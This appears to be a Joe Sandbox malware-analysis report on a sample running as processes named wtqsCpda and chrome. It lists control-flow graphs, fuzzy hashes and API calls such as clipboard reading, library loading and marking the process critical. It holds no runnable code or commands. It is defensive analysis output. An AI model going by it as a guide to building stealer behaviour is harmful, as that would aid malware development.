                                                                              • Opcode Fuzzy Hash: d5e8f30ae5ff51132b4a14c57b9cd9ca9e230e30f38e82c59d3c24b0bac4e74c
                                                                              • Instruction Fuzzy Hash: 561122B1D002098FCF15DFA8D4143EEBBB0FF44328F158699C848A7642DB38A90ACF91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 294 293a2d2-293a322 296 293a324-293a327 294->296 297 293a32a-293a355 DeleteFileW 294->297 296->297 298 293a357-293a35d 297->298 299 293a35e-293a386 297->299 298->299
                                                                              APIs
                                                                              • DeleteFileW.KERNELBASE(00000000), ref: 0293A348
                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.80315199708.0000000002930000.00000040.00000800.00020000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_15_2_2930000_wtqsCpda.jbxd
                                                                              Similarity
                                                                              • API ID: DeleteFile
                                                                              • String ID:
                                                                              • API String ID: 4033686569-0
                                                                              • Opcode ID: f18b73dd86aeae2799551ef926f566a245263f6d8c13480add6e3a614935b5b3
                                                                              • Instruction ID: 88161d3608c5f240a55b0f93f24f2d55e5bf127af91463bb20347e79230579a1
                                                                              • Opcode Fuzzy Hash: f18b73dd86aeae2799551ef926f566a245263f6d8c13480add6e3a614935b5b3
                                                                              • Instruction Fuzzy Hash: 542135B1C006599BCB10CFAAD4457EEFBB4EF48324F148159D858B7640D338A949CFA1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 285 293846c-293a322 288 293a324-293a327 285->288 289 293a32a-293a355 DeleteFileW 285->289 288->289 290 293a357-293a35d 289->290 291 293a35e-293a386 289->291 290->291
                                                                              APIs
                                                                              • DeleteFileW.KERNELBASE(00000000), ref: 0293A348
                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.80315199708.0000000002930000.00000040.00000800.00020000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_15_2_2930000_wtqsCpda.jbxd
                                                                              Similarity
                                                                              • API ID: DeleteFile
                                                                              • String ID:
                                                                              • API String ID: 4033686569-0
                                                                              • Opcode ID: 11efa7828eb5241038da7ff5190bcaa1e233b279dbf5be6f66d0d23d074e3634
                                                                              • Instruction ID: fee902dde74adc519887073221d6f1ed57a99a9a3d561b77de9ca49c70b82e2a
                                                                              • Opcode Fuzzy Hash: 11efa7828eb5241038da7ff5190bcaa1e233b279dbf5be6f66d0d23d074e3634
                                                                              • Instruction Fuzzy Hash: DA2142B1C0061A9BCB14CF9AC4447EEFBB4EF48324F14826AD818B7740D378A944CFA1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • FindCloseChangeNotification.KERNELBASE ref: 0293AAEF
                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.80315199708.0000000002930000.00000040.00000800.00020000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_15_2_2930000_wtqsCpda.jbxd
                                                                              Similarity
                                                                              • API ID: ChangeCloseFindNotification
                                                                              • String ID:
                                                                              • API String ID: 2591292051-0
                                                                              • Opcode ID: f6db0655de77ce18cad43248e4698aea2a19a5410d407963a56a77399c21f2f7
                                                                              • Instruction ID: 4c2544f464003e22c9b8c0d2bf161881253b64f17f210a21ac1c23540dc6fc8d
                                                                              • Opcode Fuzzy Hash: f6db0655de77ce18cad43248e4698aea2a19a5410d407963a56a77399c21f2f7
                                                                              • Instruction Fuzzy Hash: 161125B19002488FCB10DFAAD889BDEFBF4EF88324F148459D459A3B00C774A949CFA0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • FindCloseChangeNotification.KERNELBASE ref: 0293AAEF
                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.80315199708.0000000002930000.00000040.00000800.00020000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_15_2_2930000_wtqsCpda.jbxd
                                                                              Similarity
                                                                              • API ID: ChangeCloseFindNotification
                                                                              • String ID:
                                                                              • API String ID: 2591292051-0
                                                                              • Opcode ID: 5a8f139ad03423f4d006c4016abbf822d503718e9280299fa366d0580a511672
                                                                              • Instruction ID: abe5ea2a7d901400dfe73da3ee4c9edaed7726c1cfe3a1af9fa0d5bbd3944ee0
                                                                              • Opcode Fuzzy Hash: 5a8f139ad03423f4d006c4016abbf822d503718e9280299fa366d0580a511672
                                                                              • Instruction Fuzzy Hash: 611103B19002488FCB10DF9AD944BDEFBF8EF88324F14845AD518A7B50D774A948CFA5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.80316254344.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_15_2_4fe0000_wtqsCpda.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 2651af40d9146d15c92232f520d8b048eaec025750a916f4fe73f801de98e059
                                                                              • Instruction ID: fef47ab5247b96d0c752f994b4370dbd7ba3ed0c4e2bfefa4a2dde7fe2db7e17
                                                                              • Opcode Fuzzy Hash: 2651af40d9146d15c92232f520d8b048eaec025750a916f4fe73f801de98e059
                                                                              • Instruction Fuzzy Hash: 14426E31A0011ADFCB15DF69C584ABEBBB2FF88305F158565E405AB2A1DBB0FC52CB51
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.80316254344.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_15_2_4fe0000_wtqsCpda.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 62afbbe91b35b40957e3140095911224c0e541720c5ae11522081cbf9c9b388f
                                                                              • Instruction ID: 12bfda9b01e33a08ccde91c80e14136ab8de7a9ec3bc452c873cff9f36122864
                                                                              • Opcode Fuzzy Hash: 62afbbe91b35b40957e3140095911224c0e541720c5ae11522081cbf9c9b388f
                                                                              • Instruction Fuzzy Hash: 03F14E75E001158FCB04CF6AC9889ADB7F6FF88315B1680A9E515AB361CB71FC42CB90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.80316254344.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_15_2_4fe0000_wtqsCpda.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 250ec6f8c863a6e4ec4eecc49c385534b04d88e72bc17e3130e17b75b4b6aa12
                                                                              • Instruction ID: 58374297c09f84c768d331fde2785986340732979655a0fd60d11c79d289e0fb
                                                                              • Opcode Fuzzy Hash: 250ec6f8c863a6e4ec4eecc49c385534b04d88e72bc17e3130e17b75b4b6aa12
                                                                              • Instruction Fuzzy Hash: 2741DE31B002149FCB159B69D854AAE7BB7AFC8311F148479E906DB391DF71EC02CBA1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.80316254344.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_15_2_4fe0000_wtqsCpda.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 582b6a9779818ecd06cff88ab2ba6ec2d8af6408f14ef59c435cac01091e8419
                                                                              • Instruction ID: 2be4add3fb208e85ccdbf4e78fdb2db989ce41c78b1b94da9848a0ad3528ed06
                                                                              • Opcode Fuzzy Hash: 582b6a9779818ecd06cff88ab2ba6ec2d8af6408f14ef59c435cac01091e8419
                                                                              • Instruction Fuzzy Hash: B5316F70E002158FCB04CF6DC898ABEBBB6AF89311B158565E5149B3A1CF70AC12CBD4
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.80316254344.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_15_2_4fe0000_wtqsCpda.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d36a0133fb3667639206efd68aadb2aaae62abd0916a32de2f2c624bc249a38a
                                                                              • Instruction ID: ef64156455384e4e3a3f12a6f765bc39d742a767aa9ead62de02a36f04b027d8
                                                                              • Opcode Fuzzy Hash: d36a0133fb3667639206efd68aadb2aaae62abd0916a32de2f2c624bc249a38a
                                                                              • Instruction Fuzzy Hash: CD216B31A00245DFCB10CF6AC845BAEBFB2EF85315F048596D5149F292DBB1F412CB54
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.80316254344.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_15_2_4fe0000_wtqsCpda.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 24be576d717fae32bc888e632597b1bbfe5708c2abc2f4152961bdaef9e432c8
                                                                              • Instruction ID: 1b960db63aeb7c149700ba61a9cbc43fa1dbcf8af2cb973e9c4c5a25d01daf9c
                                                                              • Opcode Fuzzy Hash: 24be576d717fae32bc888e632597b1bbfe5708c2abc2f4152961bdaef9e432c8
                                                                              • Instruction Fuzzy Hash: CF117F36B40114DFDB148F69D844FAEBBB6BF8C321F14456AE916E7290CA71EC12CB60
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.80316254344.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_15_2_4fe0000_wtqsCpda.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 99614e940792354f62e512f1795b3a39bca6d2e93c7107afb4bb8b56256b8508
                                                                              • Instruction ID: 5d3bb76673bf9135b56764a94b6113484d16cabccc6f2f89c1c76617bc08fc58
                                                                              • Opcode Fuzzy Hash: 99614e940792354f62e512f1795b3a39bca6d2e93c7107afb4bb8b56256b8508
                                                                              • Instruction Fuzzy Hash: 17E02631A082449FCB119BF098281DEBBF8CF871043058AD6D806CB203ED308A1B8392
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.80316254344.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_15_2_4fe0000_wtqsCpda.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 1fe128b0bda7f533b7ddf3bdaa6322360ce1d1a9dd7d766ae631bf0711dbb9f8
                                                                              • Instruction ID: 9a74e766e2f1731692a2ee3d91b3bdf7bc2b40c5fea802f80581211cdd256bb9
                                                                              • Opcode Fuzzy Hash: 1fe128b0bda7f533b7ddf3bdaa6322360ce1d1a9dd7d766ae631bf0711dbb9f8
                                                                              • Instruction Fuzzy Hash: BCE0CD35D892908FC711177434590E83FB0DE8613531548FAE447C7652CD76C817CB51
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.80316254344.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_15_2_4fe0000_wtqsCpda.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: f4e2b1e8047c28a049f56bf81e59ce43534a4390c86a8de1670cf6628781aef7
                                                                              • Instruction ID: 0b521fe0a660e9138c2feb5d4b23cf49fb28f5df3c298e0a9eaff3355e27ddab
                                                                              • Opcode Fuzzy Hash: f4e2b1e8047c28a049f56bf81e59ce43534a4390c86a8de1670cf6628781aef7
                                                                              • Instruction Fuzzy Hash: 2ED0A730A00208978F24EBB4982815F73D9CF852087414EA9D80BC7601FE318A140796
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.80316254344.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_15_2_4fe0000_wtqsCpda.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 4e91f0e4c071235488ef32d300fae7fa39ae11fe28f0ca6364e4b5efbb0cb636
                                                                              • Instruction ID: 0f27d866cf355a42cfda96e25ed45c74bab3506949cbbf524ea4ded6b9572d32
                                                                              • Opcode Fuzzy Hash: 4e91f0e4c071235488ef32d300fae7fa39ae11fe28f0ca6364e4b5efbb0cb636
                                                                              • Instruction Fuzzy Hash: F6D0673AB40008EFDF059F98E840DDDF7B6FB9C221B04C166FA15A7261CA319926DB50
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.80316254344.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_15_2_4fe0000_wtqsCpda.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 039423a1c291af60978eeae6c53c30fc48d7d493fb73ce15799b388264aa1d1a
                                                                              • Instruction ID: 2d0d4cb57d6c1a1f7bd23acd0ccc5c7819dc70671aaa1b6eb1b43c7296128a57
                                                                              • Opcode Fuzzy Hash: 039423a1c291af60978eeae6c53c30fc48d7d493fb73ce15799b388264aa1d1a
                                                                              • Instruction Fuzzy Hash: D3D0C931A412148B8B142AB4B40809977D9EB89236310487AA50AC6B00DE76C8628B85
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Execution Graph

                                                                              Execution Coverage:8.2%
                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                              Signature Coverage:9.1%
                                                                              Total number of Nodes:77
                                                                              Total number of Limit Nodes:6
                                                                              execution_graph 13082 2b9f378 13083 2b9f383 13082->13083 13084 2b9f393 13083->13084 13086 2b9e8b8 13083->13086 13087 2b9f3c8 OleInitialize 13086->13087 13088 2b9f42c 13087->13088 13088->13084 13091 2b9afc8 13092 2b9afdc 13091->13092 13095 2b9b2f0 13092->13095 13101 2b9b2e0 13092->13101 13097 2b9b2f8 13095->13097 13096 2b9b30c 13096->13092 13097->13096 13107 2b9b338 13097->13107 13113 2b9b328 13097->13113 13098 2b9b321 13098->13092 13103 2b9b2f0 13101->13103 13102 2b9b30c 13102->13092 13103->13102 13105 2b9b338 OleGetClipboard 13103->13105 13106 2b9b328 OleGetClipboard 13103->13106 13104 2b9b321 13104->13092 13105->13104 13106->13104 13108 2b9b34a 13107->13108 13110 2b9b3a9 13108->13110 13119 2b9b481 13108->13119 13125 2b9b490 13108->13125 13109 2b9b36b 13109->13098 13114 2b9b34a 13113->13114 13116 2b9b3a9 13114->13116 13117 2b9b481 OleGetClipboard 13114->13117 13118 2b9b490 OleGetClipboard 13114->13118 13115 2b9b36b 13115->13098 13117->13115 13118->13115 13120 2b9b490 13119->13120 13122 2b9b4c1 13120->13122 13131 2b9f468 13120->13131 13135 2b9f462 13120->13135 13121 2b9b4df 13121->13109 13122->13109 13126 2b9b4a8 13125->13126 13128 2b9b4c1 13126->13128 13129 2b9f468 OleGetClipboard 13126->13129 13130 2b9f462 OleGetClipboard 13126->13130 13127 2b9b4df 13127->13109 13128->13109 13129->13127 13130->13127 13133 2b9f47d 13131->13133 13134 2b9f4a3 13133->13134 13139 2b9e9d0 13133->13139 13134->13121 13137 2b9f468 13135->13137 13136 2b9e9d0 OleGetClipboard 13136->13137 13137->13136 13138 2b9f4a3 13137->13138 13138->13121 13140 2b9f510 OleGetClipboard 13139->13140 13142 2b9f5aa 13140->13142 13089 2b9edd0 DuplicateHandle 13090 2b9ee66 13089->13090 13143 2b969a0 13145 2b969f3 LoadLibraryA 13143->13145 13146 2b96a86 13145->13146 13147 2b91880 13148 2b9189d 13147->13148 13149 2b91ab2 13148->13149 13151 2b9aa7c 13148->13151 13152 2b9aa23 13151->13152 13153 2b9aa87 13151->13153 13157 2b9a698 13152->13157 13164 2b9a688 13152->13164 13153->13149 13154 2b9aa70 13154->13149 13158 2b9a6af LdrInitializeThunk 13157->13158 13159 2b9aa19 13158->13159 13161 2b9a6c7 13158->13161 13162 2b9a698 LdrInitializeThunk 13159->13162 13163 2b9a688 LdrInitializeThunk 13159->13163 13160 2b9aa70 13160->13154 13161->13158 13161->13159 13162->13160 13163->13160 13165 2b9a6af LdrInitializeThunk 13164->13165 13166 2b9aa19 13165->13166 13168 2b9a6c7 13165->13168 13169 2b9a698 LdrInitializeThunk 13166->13169 13170 2b9a688 LdrInitializeThunk 13166->13170 13167 2b9aa70 13167->13154 13168->13165 13168->13166 13169->13167 13170->13167 13171 2b9aae0 13172 2b9ab24 RtlSetProcessIsCritical 13171->13172 13173 2b9ab81 13172->13173

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 96 2b9a698-2b9a6ac 97 2b9a6af-2b9a6c1 LdrInitializeThunk 96->97 98 2b9aa19-2b9aa20 call 2b9b278 97->98 99 2b9a6c7-2b9a6d6 97->99 105 2b9aa26-2b9aa2c 98->105 100 2b9a6d8-2b9a6f6 99->100 101 2b9a727-2b9a739 99->101 106 2b9a6f8-2b9a700 100->106 107 2b9a710-2b9a721 100->107 101->97 108 2b9a73f-2b9a752 101->108 114 2b9aa31-2b9aa3f 105->114 111 2b9a708-2b9a70a 106->111 107->101 107->114 108->98 113 2b9a758-2b9a75b 108->113 111->107 111->114 113->98 115 2b9a761-2b9a796 113->115 116 2b9aa6a 114->116 117 2b9aa41-2b9aa68 114->117 123 2b9a79c-2b9a7d5 115->123 183 2b9aa6a call 2b9a698 116->183 184 2b9aa6a call 2b9a688 116->184 117->116 120 2b9aa70-2b9aa77 123->97 129 2b9a7db-2b9a80f 123->129 133 2b9a819-2b9a82d 129->133 134 2b9a811-2b9a817 129->134 138 2b9a82f 133->138 139 2b9a836-2b9a851 133->139 135 2b9a853-2b9a89c 134->135 147 2b9a8ae-2b9a8b6 135->147 148 2b9a89e-2b9a8ac 135->148 138->139 139->135 150 2b9a8be-2b9a906 call 2b966a8 147->150 148->150 150->97 159 2b9a90c-2b9a94a 150->159 164 2b9a95c-2b9a964 159->164 165 2b9a94c-2b9a95a 159->165 167 2b9a96c-2b9a9b3 164->167 165->167 173 2b9a9b5-2b9a9c5 167->173 174 2b9a9c7-2b9a9d7 167->174 177 2b9a9d9-2b9aa0e 173->177 174->177 181 2b9aa14 177->181 181->123 183->120 184->120
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000012.00000002.83503409738.0000000002B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B90000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_18_2_2b90000_chrome.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: be72edce4b7b8730455c2e0341bdcf90b04d10176b7705176a7b77c78cbe8019
                                                                              • Instruction ID: 895e5be7cb86a0e96a8c072afd8c3139010f7ed7c1c8a0195861517480607bf9
                                                                              • Opcode Fuzzy Hash: be72edce4b7b8730455c2e0341bdcf90b04d10176b7705176a7b77c78cbe8019
                                                                              • Instruction Fuzzy Hash: 09B170347402409FDB19EB78D968B6A7BE6AF85718F1584A8E506DB3E5DF31DC02CB80
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 185 2b9a688-2b9a6ac 186 2b9a6af-2b9a6c1 LdrInitializeThunk 185->186 187 2b9aa19-2b9aa20 call 2b9b278 186->187 188 2b9a6c7-2b9a6d6 186->188 194 2b9aa26-2b9aa2c 187->194 189 2b9a6d8-2b9a6f6 188->189 190 2b9a727-2b9a739 188->190 195 2b9a6f8-2b9a700 189->195 196 2b9a710-2b9a721 189->196 190->186 197 2b9a73f-2b9a752 190->197 203 2b9aa31-2b9aa3f 194->203 200 2b9a708-2b9a70a 195->200 196->190 196->203 197->187 202 2b9a758-2b9a75b 197->202 200->196 200->203 202->187 204 2b9a761-2b9a796 202->204 205 2b9aa6a 203->205 206 2b9aa41-2b9aa68 203->206 212 2b9a79c-2b9a7d5 204->212 271 2b9aa6a call 2b9a698 205->271 272 2b9aa6a call 2b9a688 205->272 206->205 209 2b9aa70-2b9aa77 212->186 218 2b9a7db-2b9a80f 212->218 222 2b9a819-2b9a82d 218->222 223 2b9a811-2b9a817 218->223 227 2b9a82f 222->227 228 2b9a836-2b9a851 222->228 224 2b9a853-2b9a89c 223->224 236 2b9a8ae-2b9a8b6 224->236 237 2b9a89e-2b9a8ac 224->237 227->228 228->224 239 2b9a8be-2b9a906 call 2b966a8 236->239 237->239 239->186 248 2b9a90c-2b9a94a 239->248 253 2b9a95c-2b9a964 248->253 254 2b9a94c-2b9a95a 248->254 256 2b9a96c-2b9a9b3 253->256 254->256 262 2b9a9b5-2b9a9c5 256->262 263 2b9a9c7-2b9a9d7 256->263 266 2b9a9d9-2b9aa0e 262->266 263->266 270 2b9aa14 266->270 270->212 271->209 272->209
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000012.00000002.83503409738.0000000002B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B90000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_18_2_2b90000_chrome.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 505999b0ce1da2ae875ba59fccb0a4eda33ac1b6af5cebc673882d3fe3033fde
                                                                              • Instruction ID: 8eb4b0893998e2a3d96e259c7ae8e41a772d022aef24532c6817b746cc004a3f
                                                                              • Opcode Fuzzy Hash: 505999b0ce1da2ae875ba59fccb0a4eda33ac1b6af5cebc673882d3fe3033fde
                                                                              • Instruction Fuzzy Hash: 30916E347002409FDB59EB78D964B693BE6AFC9718F1684A8E506DB3A5DF31DC02CB90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 274 2b969a0-2b969ff 276 2b96a38-2b96a84 LoadLibraryA 274->276 277 2b96a01-2b96a0b 274->277 284 2b96a8d-2b96ac6 276->284 285 2b96a86-2b96a8c 276->285 277->276 278 2b96a0d-2b96a0f 277->278 280 2b96a11-2b96a1b 278->280 281 2b96a32-2b96a35 278->281 282 2b96a1d 280->282 283 2b96a1f-2b96a2e 280->283 281->276 282->283 283->283 286 2b96a30 283->286 289 2b96ac8-2b96acc 284->289 290 2b96ad6 284->290 285->284 286->281 289->290 291 2b96ace-2b96ad1 call 2b96590 289->291 293 2b96ad7 290->293 291->290 293->293
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000012.00000002.83503409738.0000000002B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B90000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_18_2_2b90000_chrome.jbxd
                                                                              Similarity
                                                                              • API ID: LibraryLoad
                                                                              • String ID:
                                                                              • API String ID: 1029625771-0
                                                                              • Opcode ID: 892822eecce8bd0fd15d15ef4bd9ffa405b6a01496d16c245fbfe1f7f5b2df10
                                                                              • Instruction ID: 7c9a25f39e5ae46122a7cb6ddf5d94aace3b51c4a77af88b5b8e03f6f4887cfe
                                                                              • Opcode Fuzzy Hash: 892822eecce8bd0fd15d15ef4bd9ffa405b6a01496d16c245fbfe1f7f5b2df10
                                                                              • Instruction Fuzzy Hash: 613125B0D006588FDF10DFA9CA45B9EBBF9EF48314F14C169E825A7250E778A885CF91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 316 2b9699e-2b969ff 318 2b96a38-2b96a84 LoadLibraryA 316->318 319 2b96a01-2b96a0b 316->319 326 2b96a8d-2b96ac6 318->326 327 2b96a86-2b96a8c 318->327 319->318 320 2b96a0d-2b96a0f 319->320 322 2b96a11-2b96a1b 320->322 323 2b96a32-2b96a35 320->323 324 2b96a1d 322->324 325 2b96a1f-2b96a2e 322->325 323->318 324->325 325->325 328 2b96a30 325->328 331 2b96ac8-2b96acc 326->331 332 2b96ad6 326->332 327->326 328->323 331->332 333 2b96ace-2b96ad1 call 2b96590 331->333 335 2b96ad7 332->335 333->332 335->335
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000012.00000002.83503409738.0000000002B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B90000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_18_2_2b90000_chrome.jbxd
                                                                              Similarity
                                                                              • API ID: LibraryLoad
                                                                              • String ID:
                                                                              • API String ID: 1029625771-0
                                                                              • Opcode ID: 5277f5d5e178c484be4a9d7d3011472c79326aa40d0032b4ab7cbaf75c787378
                                                                              • Instruction ID: fec7125b7c3ff9f831a385acefd160da22d9f530fb23497103222e0946b768af
                                                                              • Opcode Fuzzy Hash: 5277f5d5e178c484be4a9d7d3011472c79326aa40d0032b4ab7cbaf75c787378
                                                                              • Instruction Fuzzy Hash: 9C3123B0D006588FDF10DFA9CA8579EBBF5EF48314F14C16AE825A7290E7789885CF91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 294 2b96994-2b96995 295 2b969aa-2b969ff 294->295 296 2b96997-2b9699c 294->296 298 2b96a38-2b96a84 LoadLibraryA 295->298 299 2b96a01-2b96a0b 295->299 306 2b96a8d-2b96ac6 298->306 307 2b96a86-2b96a8c 298->307 299->298 300 2b96a0d-2b96a0f 299->300 302 2b96a11-2b96a1b 300->302 303 2b96a32-2b96a35 300->303 304 2b96a1d 302->304 305 2b96a1f-2b96a2e 302->305 303->298 304->305 305->305 308 2b96a30 305->308 311 2b96ac8-2b96acc 306->311 312 2b96ad6 306->312 307->306 308->303 311->312 313 2b96ace-2b96ad1 call 2b96590 311->313 315 2b96ad7 312->315 313->312 315->315
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000012.00000002.83503409738.0000000002B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B90000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_18_2_2b90000_chrome.jbxd
                                                                              Similarity
                                                                              • API ID: LibraryLoad
                                                                              • String ID:
                                                                              • API String ID: 1029625771-0
                                                                              • Opcode ID: 283b8518e006ba8dba8d4a40d32fc14ef2ce64b1cfed710a2648145b612d0066
                                                                              • Instruction ID: 3e787157fbf8ca16f27896e30776da15574e2cf5cd05209a6e8248db971a62da
                                                                              • Opcode Fuzzy Hash: 283b8518e006ba8dba8d4a40d32fc14ef2ce64b1cfed710a2648145b612d0066
                                                                              • Instruction Fuzzy Hash: 193132B1D002588FDF14CFA9CA4179DBBF5FB08314F1481AAE825A7290E778A885CF81
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 336 2b9f504-2b9f560 338 2b9f56a-2b9f5a8 OleGetClipboard 336->338 339 2b9f5aa-2b9f5b0 338->339 340 2b9f5b1-2b9f5c2 338->340 339->340 342 2b9f5cc-2b9f5ff 340->342 345 2b9f60f 342->345 346 2b9f601-2b9f605 342->346 348 2b9f610 345->348 346->345 347 2b9f607-2b9f60a call 2b902dc 346->347 347->345 348->348
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000012.00000002.83503409738.0000000002B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B90000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_18_2_2b90000_chrome.jbxd
                                                                              Similarity
